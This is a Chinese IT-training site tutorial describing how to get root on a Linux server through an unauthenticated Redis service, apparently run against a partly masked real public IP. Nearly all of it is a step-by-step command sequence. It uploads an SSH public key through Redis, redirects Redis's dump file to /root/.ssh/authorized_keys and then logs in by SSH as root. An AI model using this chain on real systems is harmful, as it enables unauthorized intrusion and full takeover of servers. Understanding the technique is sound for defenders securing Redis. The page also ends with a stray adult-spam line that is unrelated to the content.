千鋒教育-做有情懷、有良心、有品質的職業教育機構

                    手機站
                    千鋒教育

                    千鋒學習站 | 隨時隨地免費學

                    千鋒教育

                    掃一掃進入千鋒手機站

                    領取全套視頻
                    千鋒教育

                    關注千鋒學習站小程序
                    隨時隨地免費學習課程

                    【熱點話題】 零基礎學IT IT學習教程 IT學習筆記 IT技術干貨 IT培訓機構 IT應聘面試 IT職場就業 Java培訓機構哪些好
                    當前位置:首頁  >  關于學院  >  技術干貨  > redis未授權訪問配合ssh免密登錄getshell

                    redis未授權訪問配合ssh免密登錄getshell

                    來源:千鋒教育
                    發布人:wjy
                    時間: 2022-09-08 13:55:02 1662616502

                      在一次滲透測試中拿到一個ip地址52.80.249.xx,nmap端口掃描出22,6379,80端口,目標機是linux系統的一臺服務器,6379為redis的默認端口,嘗試對其進行利用。使用kali作為攻擊機

                      一、環境準備

                      1.1、在攻擊機上面下載redis

                      wget http://download.redis.io/releases/redis-2.8.17.tar.gz

                    redis未授權訪問配合ssh免密登錄getshell1

                      1.2解壓文件,執行文件

                      解壓文件:

                      tar xzf redis-2.8.17.tar.gz

                      進入redis目錄:

                      cd redis-2.8.17

                      安裝:make

                    redis未授權訪問配合ssh免密登錄getshell2

                      1.3、進入src目錄,將redis-server和redis-cli拷貝到/usr/bin目錄下(這樣以后啟動redis就不用進入安裝目錄了)

                      cd src

                      cp redis-server /usr/bin

                      cp redis-cli /usr/bin

                    redis未授權訪問配合ssh免密登錄getshell3

                      1.4、返回目錄redis-2.8.17,將redis.conf拷貝到/etc/目錄下

                      cd ../

                      cp redis.conf /etc/

                    redis未授權訪問配合ssh免密登錄getshell4

                      1.5、使用/etc/目錄下的reids.conf文件中的配置啟動redis服務:

                      redis-server /etc/redis.conf

                    redis未授權訪問配合ssh免密登錄getshell5

                      1.6、然后ctrl+c退出,再次進入src目錄然后連接目標靶機的redis服務

                      ctrl+c

                      cd src

                      redis-cli –h 52.80.249.xx

                    redis未授權訪問配合ssh免密登錄getshell6

                      出現52.80.249.xx:6379>就代表連接成功,并且沒有輸入密碼

                      二、漏洞利用

                      2.1、這里附上一個這里沒法利用的一種 攻擊方式截圖(沒有測試僅供參考)

                    redis未授權訪問配合ssh免密登錄getshell7

                      2.2、我們這里是不知道路徑的,根據前期信息收集知道還有ssh服務的22端口是開放的,可以利用“公私鑰”認證獲取root權限

                      使用ssh生成公鑰和私鑰文件

                      ssh-keygen -t rsa

                    redis未授權訪問配合ssh免密登錄getshell8

                      2.3、進入.ssh文件下,將上面生成的公鑰保存到1.txt里面

                      cd /root/.ssh

                      (echo -e "\n\n";cat id_rsa.pub; echo -e "\n\n") > 1.txt

                    redis未授權訪問配合ssh免密登錄getshell9

                      2.4、將生成的公鑰文件通過redis上傳到目標服務器

                      cat 1.txt | redis-cli -h 52.80.249.xx -x set crack

                    redis未授權訪問配合ssh免密登錄getshell10

                      2.5、遠程連接redis服務

                      redis-cli -h 52.80.249.xx

                    redis未授權訪問配合ssh免密登錄getshell11

                      2.6、獲得redis備份的路徑

                      config get dir

                    redis未授權訪問配合ssh免密登錄getshell12

                      2.7、更改redis備份路徑為ssh公鑰存放目錄(一般默認為/root/.ssh):

                    redis未授權訪問配合ssh免密登錄getshell13

                      2.8、設置上傳公鑰的備份文件名字為authorized_keys:

                      config set dbfilename authorized_keys

                    redis未授權訪問配合ssh免密登錄getshell14

                      2.9、檢查是否更改成功(查看有沒有authorized_keys文件),沒有問題就保存然后退出,至此成功寫入ssh公鑰到靶機

                      config get dbfilename

                    redis未授權訪問配合ssh免密登錄getshell15

                      2.10、攻擊機直接ssh連接目標服務器

                      ssh -i id_rsa root@52.80.249.xx

                    redis未授權訪問配合ssh免密登錄getshell16

                    聲明:本站稿件版權均屬千鋒教育所有,未經許可不得擅自轉載。

                    10年以上業內強師集結,手把手帶你蛻變精英

                    請您保持通訊暢通,專屬學習老師24小時內將與您1V1溝通

                    免費領取

                    今日已有369人領取成功

                    劉同學 138****2860 剛剛成功領取
                    王同學 131****2015 剛剛成功領取
                    張同學 133****4652 剛剛成功領取
                    李同學 135****8607 剛剛成功領取
                    楊同學 132****5667 剛剛成功領取
                    岳同學 134****6652 剛剛成功領取
                    梁同學 157****2950 剛剛成功領取
                    劉同學 189****1015 剛剛成功領取
                    張同學 155****4678 剛剛成功領取
                    鄒同學 139****2907 剛剛成功領取
                    董同學 138****2867 剛剛成功領取
                    周同學 136****3602 剛剛成功領取

                    推薦閱讀

                    最新文章

                    開班信息
                    北京校區
                    • 北京校區
                    • 大連校區
                    • 廣州校區
                    • 成都校區
                    • 杭州校區
                    • 長沙校區
                    • 合肥校區
                    • 南京校區
                    • 上海校區
                    • 深圳校區
                    • 武漢校區
                    • 鄭州校區
                    • 西安校區
                    • 青島校區
                    • 重慶校區
                    • 太原校區
                    • 沈陽校區

                    成·人免费午夜在线观看